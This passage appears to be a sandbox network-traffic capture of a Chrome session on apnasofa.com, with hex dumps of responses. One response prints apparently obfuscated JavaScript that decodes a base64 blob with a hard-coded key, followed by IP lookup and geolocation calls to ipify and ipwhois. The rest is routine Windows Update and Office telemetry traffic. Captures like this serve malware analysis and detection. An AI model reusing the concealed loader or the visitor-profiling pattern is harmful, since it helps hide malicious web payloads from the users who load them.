                                                                        2024-12-03 16:49:49 UTC302INData Raw: 76 61 72 20 6b 65 79 20 3d 20 22 73 65 63 72 65 74 6b 65 79 22 3b 0a 76 61 72 20 73 63 72 69 70 74 20 3d 20 61 74 6f 62 28 22 46 77 6f 41 42 77 67 52 42 52 46 58 45 67 45 48 4e 78 4d 52 42 52 45 31 47 68 59 58 46 77 73 52 47 55 31 65 4e 79 6f 75 4d 51 6f 61 48 77 41 58 42 79 6b 4d 45 77 45 52 44 30 4a 56 55 30 31 4b 55 6c 68 4b 53 78 35 7a 55 30 55 50 46 78 46 55 43 68 41 4e 48 41 49 52 45 77 63 57 44 67 45 38 48 67 51 4b 48 6b 56 4a 53 30 4a 65 53 47 39 44 55 67 59 62 42 52 59 4e 55 77 77 51 50 77 6f 57 41 67 6b 63 55 31 68 44 58 51 77 6b 41 77 6f 58 46 68 6b 4b 49 67 51 51 46 77 77 70 48 41 45 66 4d 77 73 51 47 51 6f 51 46 30 6f 4b 58 42 45 52 47 42 46 52 48 51 51 56 47 77 49 56 48 77 6f 4c 58 52 41 51 46 78 63 31 44 41 41 58 42 30 78 59 65 47 39 55 53
                                                                        Data Ascii: var key = "secretkey";var script = atob("FwoABwgRBRFXEgEHNxMRBRE1GhYXFwsRGU1eNyouMQoaHwAXBykMEwERD0JVU01KUlhKSx5zU0UPFxFUChANHAIREwcWDgE8HgQKHkVJS0JeSG9DUgYbBRYNUwwQPwoWAgkcU1hDXQwkAwoXFhkKIgQQFwwpHAEfMwsQGQoQF0oKXBERGBFRHQQVGwIVHwoLXRAQFxc1DAAXB0xYeG9US
                                                                        2024-12-03 16:49:49 UTC8529INData Raw: 42 41 74 5a 46 41 41 58 4e 77 67 56 41 67 6b 2f 41 51 6f 4f 4a 7a 63 34 51 30 78 5a 43 47 39 44 55 6b 56 55 53 30 55 61 48 41 73 51 42 6b 55 63 43 68 59 52 55 31 68 44 42 51 77 61 44 77 6f 4f 58 51 6b 4d 45 51 51 41 41 67 6f 58 58 51 30 43 41 51 31 61 47 42 41 62 41 42 45 52 47 77 73 54 51 31 52 51 53 47 39 44 55 6b 56 55 53 30 55 51 46 55 56 4c 55 77 30 56 47 41 31 51 55 78 63 47 42 68 41 47 42 55 56 65 56 46 35 70 55 6b 56 55 53 30 56 5a 42 78 63 61 55 68 35 2b 53 30 56 5a 55 30 56 44 55 6b 56 55 53 78 63 63 42 78 41 52 48 45 55 56 48 77 6f 62 57 77 30 43 41 51 31 64 55 47 39 5a 55 30 56 44 55 6b 55 4a 53 77 59 59 42 77 59 4c 55 6b 30 52 51 6b 55 43 65 55 56 44 55 6b 56 55 53 30 56 5a 55 30 55 52 46 78 45 42 47 51 74 5a 56 45 4a 59 65 45 56 55 53 30 56
                                                                        Data Ascii: BAtZFAAXNwgVAgk/AQoOJzc4Q0xZCG9DUkVUS0UaHAsQBkUcChYRU1hDBQwaDwoOXQkMEQQAAgoXXQ0CAQ1aGBAbABERGwsTQ1RQSG9DUkVUS0UQFUVLUw0VGA1QUxcGBhAGBUVeVF5pUkVUS0VZBxcaUh5+S0VZU0VDUkVUSxccBxARHEUVHwobWw0CAQ1dUG9ZU0VDUkUJSwYYBwYLUk0RQkUCeUVDUkVUS0VZU0URFxEBGQtZVEJYeEVUS0V


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        13192.168.2.449769103.160.107.1384438260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:49:48 UTC593OUTGET /favicon.ico HTTP/1.1
                                                                        Host: apnasofa.com
                                                                        Connection: keep-alive
                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                        sec-ch-ua-mobile: ?0
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                        sec-ch-ua-platform: "Windows"
                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                        Sec-Fetch-Site: same-origin
                                                                        Sec-Fetch-Mode: no-cors
                                                                        Sec-Fetch-Dest: image
                                                                        Referer: https://apnasofa.com/episode/index
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        2024-12-03 16:49:49 UTC416INHTTP/1.1 404 Not Found
                                                                        Connection: close
                                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                        pragma: no-cache
                                                                        content-type: text/html
                                                                        content-length: 1251
                                                                        date: Tue, 03 Dec 2024 16:49:49 GMT
                                                                        server: LiteSpeed
                                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                        2024-12-03 16:49:49 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                        2024-12-03 16:49:49 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                        Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        14192.168.2.449770103.160.107.1384438260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:49:49 UTC358OUTGET /episode/image/logo.png HTTP/1.1
                                                                        Host: apnasofa.com
                                                                        Connection: keep-alive
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                        Accept: */*
                                                                        Sec-Fetch-Site: none
                                                                        Sec-Fetch-Mode: cors
                                                                        Sec-Fetch-Dest: empty
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        2024-12-03 16:49:50 UTC1030INHTTP/1.1 200 OK
                                                                        Connection: close
                                                                        cache-control: public, max-age=31536000
                                                                        expires: Wed, 03 Dec 2025 16:49:49 GMT
                                                                        content-type: image/png
                                                                        last-modified: Thu, 28 Nov 2024 06:32:18 GMT
                                                                        accept-ranges: bytes
                                                                        content-length: 21327
                                                                        date: Tue, 03 Dec 2024 16:49:49 GMT
                                                                        server: LiteSpeed
                                                                        x-xss-protection: 1; mode=block
                                                                        x-frame-options: SAMEORIGIN
                                                                        x-content-type-options: nosniff
                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                        referrer-policy: strict-origin-when-cross-origin
                                                                        permissions-policy: geolocation=self
                                                                        content-security-policy: default-src 'self' https: data: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; img-src 'self' data: https: *;
                                                                        x-permitted-cross-domain-policies: none
                                                                        feature-policy: camera 'none'; microphone 'none'; geolocation 'self'
                                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                        2024-12-03 16:49:50 UTC338INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 07 4f 00 00 01 34 08 06 00 00 00 44 9d 7b b3 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 52 dc 49 44 41 54 78 da ec dd 4b 72 1b 49 da 20 5a af b2 1c 37 d5 2b 20 ea 6e 80 ac 15 10 39 e9 1e 92 35 6f 33 22 57 20 a6 71 01 82 16 40 4b e6 0a 14 32 eb 79 51 c3 be 93 04 57 50 e4 06 ba c0 15 94 78 37 f0 df 70 d0 91 82 28 3e 40 12 08 77 8f 38 c7 2c 0c 59 59 29 21 e0 8f 08 77 ff fc 11 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 37 7f 79 ea ff fc ff 8e fe 9f f3 f6 63 5f 32 f1 52 ff ed e2 ff 8e 5f f3 e7 3e fc bf 61 d2 7e 4c a4 20 af d0
                                                                        Data Ascii: PNGIHDRO4D{pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<RIDATxKrI Z7+ n95o3"W q@K2yQWPx7p(>@w8,YY)!w7yc_2R_>a~L
                                                                        2024-12-03 16:49:50 UTC14994INData Raw: 00 00 00 00 41 f0 14 00 00 00 00 00 00 60 41 f0 14 00 00 00 00 00 00 20 08 9e 02 00 00 00 00 00 00 2c 08 9e 02 00 00 00 00 00 00 04 c1 53 00 00 00 00 00 00 80 05 c1 53 00 00 00 00 00 00 80 20 78 0a 00 00 00 00 00 00 b0 20 78 0a 00 00 00 00 00 00 10 04 4f 01 00 00 00 00 00 00 16 04 4f 01 00 00 00 00 00 00 82 e0 29 00 00 00 00 00 00 c0 82 e0 29 00 00 00 00 00 00 40 10 3c 05 00 00 00 00 00 00 58 10 3c 05 00 00 00 00 00 00 08 82 a7 00 00 00 00 00 00 00 0b 82 a7 00 00 00 00 00 00 00 41 f0 14 00 00 00 00 00 00 60 41 f0 14 00 00 00 00 00 00 20 08 9e 02 00 00 00 00 00 00 2c 08 9e 02 00 00 00 00 00 00 04 c1 53 00 00 00 00 00 00 80 05 c1 53 00 00 00 00 00 00 80 20 78 0a 00 00 00 00 00 00 b0 20 78 0a 00 00 00 00 00 00 10 04 4f 01 00 00 00 00 00 00 16 04 4f 01 00 00
                                                                        Data Ascii: A`A ,SS x xOO))@<X<A`A ,SS x xOO
                                                                        2024-12-03 16:49:50 UTC5995INData Raw: dd 7a 7f 92 b3 bc a4 5d b1 e8 a6 4d f6 ae 84 67 c4 3a 79 2e 78 0a 00 6f d7 b7 40 e3 6d 30 b8 43 47 d2 39 76 a5 0c 82 37 72 84 02 95 f0 3c de 4b b3 c1 87 62 2a df 8b 7e 6f 7c ed c1 f3 7a 56 c0 3d c4 01 d8 21 4d 8c 98 a8 d7 14 cc f1 11 f4 c6 40 ce 8d cf d9 87 9d f6 6d f2 53 9a e0 74 38 f0 76 d9 90 9c 84 bc ab 8c d7 ce 73 c1 53 00 78 a3 b4 fd d6 75 8f 7e d2 85 ad 02 e9 ba cc 15 72 1f 07 6d c7 ed 44 76 a0 7e 3c 68 10 3b 12 a4 55 a7 07 99 6f e3 da ec f7 67 35 ea f5 46 0c 62 f5 69 1a 94 cd fd 7e bf 4d 13 c6 e0 21 82 a7 f4 49 15 db 71 be 45 e6 1d c8 76 43 ff 26 3f 4d b5 cb 86 a1 90 36 d9 da 79 2e 78 0a 00 9b 71 ee b7 40 2f 3a 2b 53 db f7 52 92 34 41 e7 a6 80 5b 89 67 9f 4e 07 90 e4 25 fc c6 46 c9 af a6 5e bc f6 fe 73 9e 97 b6 6a 28 67 7e 4f 43 fe 15 0e 06 66 79
                                                                        Data Ascii: z]Mg:y.xo@m0CG9v7r<Kb*~o|zV=!M@mSt8vsSxu~rmDv~<h;Uog5Fbi~M!IqEvC&?M6y.xq@/:+SR4A[gN%F^sj(g~OCfy


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        15192.168.2.449771104.26.12.2054438260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:49:50 UTC349OUTGET /?format=json HTTP/1.1
                                                                        Host: api.ipify.org
                                                                        Connection: keep-alive
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                        Accept: */*
                                                                        Sec-Fetch-Site: none
                                                                        Sec-Fetch-Mode: cors
                                                                        Sec-Fetch-Dest: empty
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        2024-12-03 16:49:50 UTC428INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:49:50 GMT
                                                                        Content-Type: application/json
                                                                        Content-Length: 21
                                                                        Connection: close
                                                                        Vary: Origin
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Server: cloudflare
                                                                        CF-RAY: 8ec50d62c9987c96-EWR
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1796&min_rtt=1796&rtt_var=898&sent=8&recv=9&lost=0&retrans=1&sent_bytes=4180&recv_bytes=927&delivery_rate=33224&cwnd=173&unsent_bytes=0&cid=5c7ecdfc78cebce9&ts=629&x=0"
                                                                        2024-12-03 16:49:50 UTC21INData Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 7d
                                                                        Data Ascii: {"ip":"8.46.123.228"}


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        16192.168.2.449772103.126.138.874438260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:49:51 UTC550OUTGET /json/8.46.123.228 HTTP/1.1
                                                                        Host: ipwhois.app
                                                                        Connection: keep-alive
                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                        sec-ch-ua-mobile: ?0
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                        sec-ch-ua-platform: "Windows"
                                                                        Accept: */*
                                                                        Origin: https://apnasofa.com
                                                                        Sec-Fetch-Site: cross-site
                                                                        Sec-Fetch-Mode: cors
                                                                        Sec-Fetch-Dest: empty
                                                                        Referer: https://apnasofa.com/
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        2024-12-03 16:49:51 UTC255INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:49:51 GMT
                                                                        Content-Type: application/json; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Server: ipwhois
                                                                        Access-Control-Allow-Origin: *
                                                                        Access-Control-Allow-Headers: *
                                                                        X-Robots-Tag: noindex
                                                                        2024-12-03 16:49:51 UTC69INData Raw: 33 61 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 66 61 6c 73 65 2c 22 6d 65 73 73 61 67 65 22 3a 22 79 6f 75 27 76 65 20 68 69 74 20 74 68 65 20 6d 6f 6e 74 68 6c 79 20 6c 69 6d 69 74 22 7d 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 3a{"success":false,"message":"you've hit the monthly limit"}0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        17192.168.2.449773103.126.138.874438260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:49:53 UTC352OUTGET /json/8.46.123.228 HTTP/1.1
                                                                        Host: ipwhois.app
                                                                        Connection: keep-alive
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                        Accept: */*
                                                                        Sec-Fetch-Site: none
                                                                        Sec-Fetch-Mode: cors
                                                                        Sec-Fetch-Dest: empty
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        2024-12-03 16:49:54 UTC255INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:49:54 GMT
                                                                        Content-Type: application/json; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Server: ipwhois
                                                                        Access-Control-Allow-Origin: *
                                                                        Access-Control-Allow-Headers: *
                                                                        X-Robots-Tag: noindex
                                                                        2024-12-03 16:49:54 UTC699INData Raw: 32 61 66 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 2c 22 73 75 63 63 65 73 73 22 3a 74 72 75 65 2c 22 74 79 70 65 22 3a 22 49 50 76 34 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 22 4e 41 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 66 6c 61 67 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 69 70 77 68 6f 69 73 2e 69 6f 5c 2f 66 6c 61 67 73 5c 2f 75 73 2e 73 76 67 22 2c 22 63 6f 75 6e 74 72 79 5f 63 61 70 69 74 61 6c 22 3a 22 57 61 73 68 69 6e 67 74 6f 6e 20 44 2e 43 2e 22 2c 22 63 6f 75 6e 74 72 79 5f 70 68
                                                                        Data Ascii: 2af{"ip":"8.46.123.228","success":true,"type":"IPv4","continent":"North America","continent_code":"NA","country":"United States","country_code":"US","country_flag":"https:\/\/cdn.ipwhois.io\/flags\/us.svg","country_capital":"Washington D.C.","country_ph


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        18192.168.2.44977420.109.210.53443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:21 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=7Ykm4fASykGa2oz&MD=Wv9kBFLN HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept: */*
                                                                        User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                        Host: slscr.update.microsoft.com
                                                                        2024-12-03 16:50:22 UTC560INHTTP/1.1 200 OK
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        Content-Type: application/octet-stream
                                                                        Expires: -1
                                                                        Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                        ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                        MS-CorrelationId: e269ae06-b4e8-4c46-917b-4df9fbbda044
                                                                        MS-RequestId: 04a83eb3-6e39-4b47-bb1f-df627f2d2414
                                                                        MS-CV: 0qy3yrkjrEq13jJH.0
                                                                        X-Microsoft-SLSClientCache: 1440
                                                                        Content-Disposition: attachment; filename=environment.cab
                                                                        X-Content-Type-Options: nosniff
                                                                        Date: Tue, 03 Dec 2024 16:50:21 GMT
                                                                        Connection: close
                                                                        Content-Length: 30005
                                                                        2024-12-03 16:50:22 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                        Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                        2024-12-03 16:50:22 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                        Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        19192.168.2.44977513.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:22 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:23 UTC471INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:22 GMT
                                                                        Content-Type: text/plain
                                                                        Content-Length: 218853
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public
                                                                        Last-Modified: Fri, 29 Nov 2024 23:15:49 GMT
                                                                        ETag: "0x8DD10CBC2E3B852"
                                                                        x-ms-request-id: 82d9e4b2-501e-007b-3a87-435ba2000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165022Z-174f78459685m244hC1EWRgp2c0000001640000000003mdq
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:23 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                        Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                        2024-12-03 16:50:23 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                                                                        Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
